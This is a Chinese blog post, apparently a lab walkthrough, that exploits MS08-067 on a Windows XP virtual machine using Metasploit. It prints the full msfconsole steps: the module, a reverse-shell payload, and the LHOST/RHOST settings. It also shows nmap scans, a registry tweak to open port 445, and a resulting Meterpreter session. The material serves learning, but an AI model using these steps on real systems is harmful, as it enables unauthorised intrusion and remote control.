matasploit框架漏洞利用

最新推荐文章于 2023-09-05 18:32:52 发布

JacobTsang

最新推荐文章于 2023-09-05 18:32:52 发布

阅读量446

点赞数

分类专栏： Information Security

本文链接：https://blog.csdn.net/weixin_41594045/article/details/103306370

版权

Information Security 专栏收录该内容

49 篇文章 5 订阅

订阅专栏

Kali：192.168.163.144
XP：192.168.163.136

XP关闭防火墙，测试两机器是否ping通。
在这里插入图片描述

msf > search ms08_067
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

————————————————

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

————————————————

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp

————————————————


msf exploit(ms08_067_netapi) > set LHOST 192.168.163.144
LHOST => 192.168.163.144
msf exploit(ms08_067_netapi) > set RHOST 192.168.163.136
RHOST => 192.168.163.136

————————————————

msf exploit(ms08_067_netapi) > exploit 

[*] Started reverse TCP handler on 192.168.163.144:4444 
[*] 192.168.163.136:445 - Automatically detecting the target...
[*] 192.168.163.136:445 - Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] 192.168.163.136:445 - Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] 192.168.163.136:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

————————————————

root@localhost:~# nmap -PS 192.168.163.136
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 21:53 EST
Nmap scan report for 192.168.163.136
Host is up (0.0017s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
MAC Address: 00:0C:29:BA:06:17 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds

————————————————

445端口的打开方法：开始-运行输入regedit.修改注册表，添加一个键值 Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControlSet\Services\NetBT\Parameters Name: SMBDeviceEnabled Type: REG_DWORD Value: 1 重新启动运行--CMD--输入netstat -an 可以看到开放的端口

————————————————

root@localhost:~# nmap -PS 192.168.163.136 445

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-28 22:02 EST
setup_target: failed to determine route to 445 (0.0.1.189)
Nmap scan report for 192.168.163.136
Host is up (0.00062s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:BA:06:17 (VMware)

————————————————

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.163.136
[*] Meterpreter session 1 opened (192.168.163.144:41614 -> 192.168.163.136:4444) at 2019-11-29 17:29:32

meterpreter >